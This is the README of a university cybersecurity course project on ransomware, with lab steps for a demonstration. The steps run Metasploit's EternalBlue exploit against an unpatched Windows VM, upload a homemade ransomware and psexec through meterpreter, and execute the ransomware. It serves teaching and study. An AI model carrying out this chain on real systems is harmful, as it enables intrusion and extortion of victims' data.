OT9-Ransomwares

This repository hosts all the data linked to an OT9 project, a cybersecurity course from INSA Lyon (5th year, IF Department). The goal is to provide a brief analysis of ransomwares (History, State of the Art, Trends, Preventing & Recovering) including a small demonstration of the EternalBlue exploit with a small handwritten (and pretty dumb) ransomware.

You will find multiple subprojects:

• ctrlcmd-server: That is the server that will provide an encryption key to the target, it will also emulate the payment of the ransom
• ransomware: That is the ransomware itself, a pretty basic one
• report: That is the final report (a paper and defense)

All programs are written in Rust, the paper is based on Typst.

The Demonstration

Here is a recorded demonstration

Run the demonstration

Build ransomware and ctrlcmd-server

Then simply go in the project folder and run cargo build with the specified commands:

• cargo build --releasefor the ctrlcmd
• cargo build --target x86_64-pc-windows-gnu --release for the ransomware (will run on a Windows 10 VM, the target)

Target

• Start a Windows VM (even works with firewall enabled), it must be an unpatched version (I use a 1507)
• You may want to go to gpedit.msc then go to Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options, edit 'Network access: Shares that can be accessed anonymously' and add " \ " to the empty list

CtrlCmd

• Start the ctrlcmd server using ./ctrlcmd-server/target/release/ctrlcmd-server

Exegol

• Copy the ransomware to your exegol workspace, (ie. cp ransomware/target/x86_64-pc-windows-gnu/release/ransomware.exe $HOME/.exegol/workspaces/default/ransomware.exe)
• Start the exegol environment using exegol start (I use the nightly image with default settings)
• Start metasploit with msfconsole
• Search for the EternalBlue exploit with search eternalblue, it will output something like:

Matching Modules
================
   #   Name                                           Disclosure Date  Rank     Check  Description
   -   ----                                           ---------------  ----     -----  -----------
   0   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1     \_ target: Automatic Target                  .                .        .      .
   2     \_ target: Windows 7                         .                .        .      .
   3     \_ target: Windows Embedded Standard 7       .                .        .      .
   4     \_ target: Windows Server 2008 R2            .                .        .      .
   5     \_ target: Windows 8                         .                .        .      .
   6     \_ target: Windows 8.1                       .                .        .      .
   7     \_ target: Windows Server 2012               .                .        .      .
   8     \_ target: Windows 10 Pro                    .                .        .      .
   9     \_ target: Windows 10 Enterprise Evaluation  .                .        .      .

• As you can see, you can now select the right exploit using use exploit/windows/smb/ms17_010_eternalblue
• Set target port with set RPORT 44500 (default is 445, changed it to accomodate some constraints)
• Set target adresse to localhost with set RHOST 127.0.0.1
• Then simply run using exploit

You should now be in meterpreter! Congratulations, you are your target admin!

• Use getuid to check that you're AUTHORITY
• Upload the ransomware using upload ransomware.exe c:\\windows\\system32
• Upload the ransomware using upload psexec.exe c:\\windows\\system32
• Finally execute the ransomware! shell then psexec -i 1 C:\Windows\system32\ransomware.exe (run interactively on user session)
• When wanted, change the message on the ctrl-cmd server to something which contains paid